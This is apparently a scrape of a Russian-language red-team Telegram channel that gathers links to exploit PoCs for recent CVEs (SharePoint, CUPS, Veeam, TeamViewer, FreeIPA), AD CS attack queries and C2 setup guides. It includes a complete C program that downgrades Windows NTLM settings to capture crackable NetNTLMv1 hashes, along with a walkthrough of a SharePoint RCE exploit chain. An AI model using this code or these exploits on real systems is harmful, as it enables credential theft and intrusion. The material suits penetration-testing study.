26812
Пул тегов: https://t.me/RalfHackerChannel/297 Чат канала: https://t.me/RalfHackerPublicChat Админ: @hackerralf8
Так, новая техника инъекции в процессы - Early Cascade Injection.
Ну и ресерч достаточно подробный)
https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/
#redteam #maldev #bypass
Забыл написать, тут же ESC15 появился))
https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc
Для поиска в BloodHound CE:
MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p
🛠 Всем привет. Я тут допилил тулу для рекона на основе информации из Azure (без аутентификации).
Смысл в том, чтобы доставать из ажура домены и инфу по тенанту (например какой у таргета SSO).
Давно хотел сделать такой аналог AADInternals, но без смс, регистрации, пауэршелла, дополнительных зависимостей. Только статический бинарник, только хардкор.
Тула поддерживает STDIN/STDOUT, поэтому можно использовать ее в пайплайнах с другими вещами, например от ProjectDiscovery.
Выглядит это безобразие так:
📖 Установка:
go install -v github.com/haxxm0nkey/azhunt@latest
git clone https://github.com/haxxm0nkey/azhunt.git
cd azhunt
go build
mv azhunt /usr/local/bin/
azhunt
azhunt -d microsoft.com
azhunt -d microsoft.com -silent
Bypass LSA protection using the BYODLL technique
https://github.com/itm4n/PPLrevenant
#pentest #redteam #bypass
Specterops продолжает пиарить показывать фичи BloodHound CE, и на этот раз разбирает техники ESC6, ESC9 и ESC10 для ADCS))
https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb00856ac
P.S. заметил, что предыдущие две статьи не кидал. Исправляюсь: раз и два
🖊️Семантические уязвимости в серверах Apache
В связи с недавно прошедшими мероприятиями и моим отпуском не было времени упомянуть некоторые крутые недавно опубликованные доклады. И к одному из таких относится ресерч старины Orange Tsai, в ходе которого было найдено сразу несколько CVE и различных мисконфигов в серверах Apache.
Странно, что никто об этом еще не написал, так как материал очень интересный и я всем рекомендую ознакомиться с оригиналом по ссылке. Я также набросал несколько шаблонов для Nuclei на основе этого доклада, которые вы можете доработать или использовать как есть на своих целях (закину их в комменты под постом).
#web #apache #cve
Уже не новость, что Notion уходит, вот альтернатива)
https://github.com/toeverything/AFFiNE
Кто пользуется, накидайте фидбек в комменты))
#notes #git #soft
🔐 FreeIPA Rosting (CVE-2024-3183)
A vulnerability recently discovered by my friend @Im10n in FreeIPA involves a Kerberos TGS-REQ being encrypted using the client’s session key. If a principal’s key is compromised, an attacker could potentially perform offline brute-force attacks to decrypt tickets by exploiting the encrypted key and associated salts.
🔗Source:
https://github.com/Cyxow/CVE-2024-3183-POC
#freeipa #kerberos #hashcat #cve
———
Добавляем доклад Миши в вишлист на Offzone 🚶♂️
Всем привет, в связи с тем что последнее время приходится часто пентестить FreeIPA мы начали разрабатывать либу по типу impacket заточенную под особенности ипы. Пока начали реализовывать kerberos и написали пок для CVE-2024-3183. Если у кого-то будет желание как-то помочь в разработке - welcome.
https://github.com/c2micro/ipapocket
Много чего про SCCM в последнее время появляется, вот еще:
Soft: https://github.com/synacktiv/SCCMSecrets
Blog: https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial
#pentest #redteam #ad #sccm #lateral #creds
CVE-2024-38077: Windows Remote Desktop Licensing Service RCE
https://github.com/CloudCrowSec001/CVE-2024-38077-POC
Запатчено 9 июля
#exploit #ad #rce #pentest #redteam
https://youtu.be/InyrqNeaZfQ?si=TZ-qzgB56XWnPD-E
Инструмент позволяет получить NetNTLM-хеши ЛЮБОГО пользователя, чья сессия присутствует на хосте.
Требования по правам: любые.
Софт: https://github.com/MzHmO/LeakedWallpaper
Способ до установки июньского фикса KB5040434 будет работать безотказно.
@Michaelzhm, молодец)
#lateral #pentest #ad #redteam
В одном скрипте несколько способов закрепа в Unix
https://github.com/Aegrah/PANIX
It prioritizes functionality over stealth and is easily detectable.
Еще одна картошка)) Абузит RPCSS в DCOM при обработке OXID
https://github.com/lypd0/DeadPotato
#lpe #potato #ad #pentest #redteam
🖼️ Microsoft SharePoint Server 20219 — RCE
PoC for:
— CVE-2024-38094
— CVE-2024-38024
— CVE-2024-38023
🔗 Source:
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
#sharepoint #poc #rce #cve
Интересные у них отчеты, люблю такое чтиво и всем рекомендую) и атакерам, и защитникам))
/channel/s3Ch1n7/427
#report
CVE-2024-7479 & CVE-2024-7481: TeamViewer User to Kernel LPE
PoC: https://youtu.be/lUkAMAK-TPI
exploit: https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481
Affected:
* from 15.0.0 before 15.58.4
* from 14.0.0 before 14.7.48796
* from 13.0.0 before 13.2.36225
* from 12.0.0 before 12.0.259312
* from 11.0.0 before 11.0.259311
CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, CVE-2024-47177: Linux OpenPrinting CUPS RCE
blog: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
PoC: https://github.com/RickdeJager/cupshax
patch:
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
🖥 Veeam Backup & Response — RCE (CVE-2024-40711)
A critical deserialization vulnerability in .NET Remoting has been discovered in Veeam Backup & Replication, allowing unauthenticated remote code execution (RCE). The flaw affects versions 12.1.2.172 and earlier.
🔗 Research:
https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
🔗 Source:
https://github.com/watchtowrlabs/CVE-2024-40711
#veeam #backup #deserialization #unauth #rce
👩💻 Nagios XI — RCE
Nagios XI 2024R1.01 has a vulnerability in the monitoringwizard.php component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution.
🔗 Source:
https://github.com/MAWK0235/CVE-2024-24401
#nagios #sql #rce #privesc #poc #exploit
Всем привет! Давным-давно появился инструмент msi_search, который создали mandiant для анализа установленных MSI-файлов на системе. Впоследствии эти файлы можно было выкачать и проанализировать на предмет уязвимостей. Подобный вектор привеска достаточно не самый примитивный и обычный, однако, я не раз встречал интересные инсталляторы, которые нужно было как-то сломать :)
Сам формат MSI предательски похож на формат SQL, что упрощало написание автоматизированного чекера на уязвимости. Так родился инструмент MyMSIAnalyzer , я научил его:
- Обнаруживать оставленные учетные данные внутри MSI-файла
- Анализировать CustomActions на предмет наличия действий, исполняемых от лица системы
- Проверять возможность перезаписи CustomActions, что может использоваться как для повышения привилегий, так и закрепления
- Проверка сигнатур (нужно в контексте MST Backdoor), а также отдельная программа для обнаружения GUI внутри MSI, ведь в таком случае возможно осуществить побег в cmd.exe через запуск explorer.exe
Полный разбор MSI-файлов как вектора повышения привилегий я выложил на medium. Приятного чтения :))
Cobalt Strike - CDN & Reverse Proxy Setup. Подробно описанный мануал по подготовке C2 инфраструктуры CS на примере Azure.
https://redops.at/en/blog/cobalt-strike-cdn-reverse-proxy-setup
#redteam #infra #bypass
Наш хороший товарищ Алексей Федулаев недавно провел замечательный вебинар "Побеги из контейнеров / Docker Escape", который можно посмотреть на его канале и к которому идет сопроводительный репозитарий со всеми инструкциями и исходными кодами!
Среди рассматриваемых побегов, следующие сценарии:
1) с помощью SYS_ADMIN
2) с помощью SYS_PTRACE
3) с помощью SYS_MODULE
4) с помощью DAC_READ_SEARCH
5) с помощью DAC_OVERRIDE
6) с помощью docker soсket внутри контейнера
Также у Алексея есть вебинары "Атаки на CICD", "Безопасность Docker. Ультимативный гайд по харденингу Docker", "Введение в безопасность Docker".
P.S. Про побеги из контейнеров особенно актуально в преддверии нашего доклад на OFFZONE 2024 ;)
P.S.S. Если вы что-то создаете по тематике канала, то не стесняйтесь это присылать!
Всем привет) давно хотел начать вести в паблике какой-нибудь проект, и вот решил сейчас модно писать публичный С2. Идей много, что из этого получится, пока не знаю... может так ничего и не выйдет, а вдруг будет (надеюсь) как с Empire - его кто-то начнет дописывать.
Так как софт будет публичный, а я не особо программист, то буду рад помощи не только в рефакторинге кодовой базы, написании модулей, расширений, но и к идеям для улучшений. Например, дизайн, алгоритмы, поиск багов, да и просто указать на востребованность какого-то функционала.
Теперь обращаюсь к тем, кто хочет поучаствовать, а также кому просто интересно следить за проектом. Вот канал и группа(по ссылке)... Спама на канале будет много: размышления, опросы и т.п.
Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.
#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep
void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
HKEY hKey;
DWORD value;
DWORD valueSize = sizeof(DWORD);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
RegCloseKey(hKey);
*oldValue = value;
} else {
printf("Ошибка чтения ключа реестра.\n");
}
}
void SetRegKey(const char* path, const char* key, DWORD newValue) {
HKEY hKey;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
RegCloseKey(hKey);
} else {
printf("Ошибка записи ключа реестра.\n");
}
}
void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}
void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}
int main() {
DWORD oldValue_LMCompatibilityLevel = 0;
DWORD oldValue_NtlmMinClientSec = 0;
DWORD oldValue_RestrictSendingNTLMTraffic = 0;
ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);
// Задержка 60 секунд
sleep(60);
NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);
return 0;
}
x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c
RCE через Microsoft SharePoint Server 2019
Microsoft SharePoint — веб-платформа для совместной работы, управления документами и организации совместного доступа к информации в организациях, которая широко используется в корпоративной среде.
Недавно увидел интересные CVE которые затрагивают эту веб-платформу:
CVE-2024-38094
CVE-2024-38024
CVE-2024-38023
Чтобы успешно эксплуатировать RCE, необходимо выполнить несколько условий, а именно
1) Сетевой доступ к уязвимому серверу SharePoint.
2) Учетные данные (лог/пасс) для NTLM аутентификации + учетная запись должна иметь права на создание файлов и папок.
Для успешной эксплуатации уязвимости предоставляется три скрипта: poc_filtered.py, poc_specific.py и poc_sub.py. Сейчас коротко разберем суть и как они работают.
Все три скрипта используют NTLM аутентификацию для доступа к API SharePoint и выполняют схожие действия:
Скрипты сначала аутентифицируются на сервере SharePoint с использованием предоставленных учетных данных. Затем они создают необходимые папки на сервере, такие как BusinessDataMetadataCatalog, отправляя POST-запросы к API SharePoint по пути /api/web/Folders.
Далее создается и загружается файл метаданных BDCMetadata.bdcm, содержащий информацию для выполнения уязвимости. В информации находятся команды для выполнения различных методов SharePoint, таких как GetCreatorView, GetDefaultValues, GetFilters и FindFiltered. Эти методы позволяют взаимодействовать с объектами и данными SharePoint, что в конечном итоге позволяет выполнить произвольный код.
То есть после запуска poc_filtered.py создается новая папка BusinessDataMetadataCatalog, после чего скрипт получает и сохраняет значение X-RequestDigest для дальнейших запросов. X-RequestDigest — это токен, подтверждающий, что запрос исходит от подлинного пользователя. Этот токен включается в заголовки последующих запросов для подтверждения их подлинности. Затем скрипт создает и загружает файл метаданных BDCMetadata.bdcm в созданную папку. Этот файл содержит данные и команды, которые будут использоваться для выполнения уязвимости. В конце, скрипт отправляет специально сформированный XML-запрос к API SharePoint для выполнения уязвимых методов, что позволяет выполнить произвольный код на сервере.
Но между скриптами есть небольшая разница, а именно в используемых методах.
1) poc_filtered.py использует метод FindFiltered для взаимодействия с объектами SharePoint.
2) poc_specific.py использует метод FindSpecific для выполнения конкретных задач и команд.
3) poc_sub.py в этом скрипте используется метод Subscribe для подписки на события или действия.
PoC
PoC Video
FakePotato зарегестрировано как CVE-2024-38100. Опять DCOM для обхода контекста безопасности...
https://decoder.cloud/2024/08/02/the-fake-potato/
Помечено как "Important LPE", но запатчено в июле... MS такой MS 😅😂
#pentest #redteam #lpe #ad
А это прикольно. Можно получать креды на 445 порту (или релеить) без загрузки драйверов или либ в LSASS😁 есть python версия, и есть BOF...
Статья: https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac
Софт: https://github.com/zyn3rgy/smbtakeover
#pentest #redteam
Если кто вникает во FreeIPA, вот полезная статейка))
https://habr.com/ru/companies/rvision/articles/825086/
#freeipa #pentest
————————————————————
CVE-2024-37081: VMware vCenter Server Multiple LPE
CVE-2024-22274: VMware vCenter Server RCE
#exploit #pentest #redteam